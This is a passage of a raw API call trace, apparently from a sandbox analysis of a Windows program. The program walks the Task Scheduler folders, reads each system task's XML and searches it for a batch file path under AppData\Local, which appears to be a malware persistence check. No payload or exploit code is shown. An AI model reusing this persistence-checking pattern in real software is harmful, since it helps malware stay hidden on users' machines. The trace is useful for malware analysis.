ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.896] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.896] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.896] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.896] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x40, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.896] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.897] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.897] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.897] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="ForceSynchronizeTime") returned 0x0 [0163.897] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-602)\r\n \\Microsoft\\Windows\\Time Synchronization\\ForceSynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n 7510BCA32F018915\r\n \r\n \r\n \r\n \r\n {A31AD6C2-FF4C-43D4-8E90-7101023096F9}\r\n \r\n \r\n \r\n") returned 0x0 [0163.898] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-602)\r\n \\Microsoft\\Windows\\Time Synchronization\\ForceSynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n 7510BCA32F018915\r\n \r\n \r\n \r\n \r\n {A31AD6C2-FF4C-43D4-8E90-7101023096F9}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.898] IUnknown:Release (This=0x929730) returned 0x0 [0163.898] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.898] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="SynchronizeTime") returned 0x0 [0163.898] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n \\Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0163.899] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n \\Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.899] IUnknown:Release (This=0x929730) returned 0x0 [0163.899] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.899] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.900] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.900] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.900] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.900] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x41, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.900] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.901] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.901] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.901] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="SynchronizeTimeZone") returned 0x0 [0163.901] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2013-01-10T16:32:04.2837388\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-101)\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-102)\r\n \\Microsoft\\Windows\\Time Zone\\SynchronizeTimeZone\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT1H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\tzsync.exe\r\n \r\n \r\n") returned 0x0 [0163.902] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-01-10T16:32:04.2837388\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-101)\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-102)\r\n \\Microsoft\\Windows\\Time Zone\\SynchronizeTimeZone\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT1H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\tzsync.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.902] IUnknown:Release (This=0x929710) returned 0x0 [0163.902] IUnknown:Release (This=0x929590) returned 0x0 [0163.902] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.902] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.902] IUnknown:Release (This=0x929590) returned 0x0 [0163.902] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.902] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.903] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.908] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.908] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.908] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="Tpm-HASCertRetr") returned 0x0 [0163.908] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2015-02-16T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-605)\r\n \\Microsoft\\Windows\\TPM\\Tpm-HASCertRetr\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3250F9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0163.909] StrStrIW (lpFirst="\r\n\r\n \r\n 2015-02-16T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-605)\r\n \\Microsoft\\Windows\\TPM\\Tpm-HASCertRetr\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3250F9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.909] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.909] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.909] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="Tpm-Maintenance") returned 0x0 [0163.909] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-06-10T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-1469317444-2401623638-2778953283-1691679301-3481717153)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-602)\r\n \\Microsoft\\Windows\\TPM\\Tpm-Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA3391E8B41\r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n 750CBCA3290B9641\r\n \r\n \r\n 7510BCA3391E8B41\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0163.910] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-06-10T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-1469317444-2401623638-2778953283-1691679301-3481717153)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-602)\r\n \\Microsoft\\Windows\\TPM\\Tpm-Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA3391E8B41\r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n 750CBCA3290B9641\r\n \r\n \r\n 7510BCA3391E8B41\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.910] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.910] IUnknown:Release (This=0x929580) returned 0x0 [0163.910] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.911] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.911] IUnknown:Release (This=0x929580) returned 0x0 [0163.911] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.911] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x43, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.911] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.912] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=7) returned 0x0 [0163.912] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.912] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Maintenance Install") returned 0x0 [0163.912] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Maintenance Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n") returned 0x0 [0163.912] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Maintenance Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.913] IUnknown:Release (This=0x929730) returned 0x0 [0163.913] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.913] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Policy Install") returned 0x0 [0163.913] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Policy Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n 2021-02-11T13:20:59+02:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n") returned 0x0 [0163.913] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Policy Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n 2021-02-11T13:20:59+02:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.914] IUnknown:Release (This=0x929730) returned 0x0 [0163.914] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.914] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Reboot") returned 0x0 [0163.914] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-106)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Reboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2000-01-01T03:00:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\MusNotification.exe\r\n \r\n \r\n") returned 0x0 [0163.914] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-106)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Reboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2000-01-01T03:00:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\MusNotification.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.914] IUnknown:Release (This=0x929730) returned 0x0 [0163.914] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.915] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Resume On Boot") returned 0x0 [0163.915] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Resume On Boot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n ResumeUpdate\r\n \r\n \r\n") returned 0x0 [0163.915] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Resume On Boot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n ResumeUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.915] IUnknown:Release (This=0x929730) returned 0x0 [0163.915] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.916] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Schedule Scan") returned 0x0 [0163.916] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-105)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-23T12:28:57+02:00\r\n \r\n PT22H\r\n \r\n PT4H\r\n \r\n \r\n PT2H\r\n 7524BCA33E06830D\r\n 01\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[EventID=8202]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartScan\r\n \r\n \r\n") returned 0x0 [0163.917] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-105)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-23T12:28:57+02:00\r\n \r\n PT22H\r\n \r\n PT4H\r\n \r\n \r\n PT2H\r\n 7524BCA33E06830D\r\n 01\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[EventID=8202]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartScan\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.917] IUnknown:Release (This=0x929730) returned 0x0 [0163.917] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.917] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="USO_UxBroker_Display") returned 0x0 [0163.917] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_Display\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA3381D8941\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n Display\r\n \r\n \r\n") returned 0x0 [0163.918] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_Display\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA3381D8941\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n Display\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.918] IUnknown:Release (This=0x929730) returned 0x0 [0163.918] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.918] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="USO_UxBroker_ReadyToReboot") returned 0x0 [0163.918] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_ReadyToReboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7520BCA3381D8941\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n ReadyToReboot\r\n \r\n \r\n") returned 0x0 [0163.920] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_ReadyToReboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7520BCA3381D8941\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n ReadyToReboot\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.920] IUnknown:Release (This=0x929730) returned 0x0 [0163.920] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.920] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.923] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.923] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.923] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.923] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.923] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.927] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.927] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.927] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="UPnPHostConfig") returned 0x0 [0163.927] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 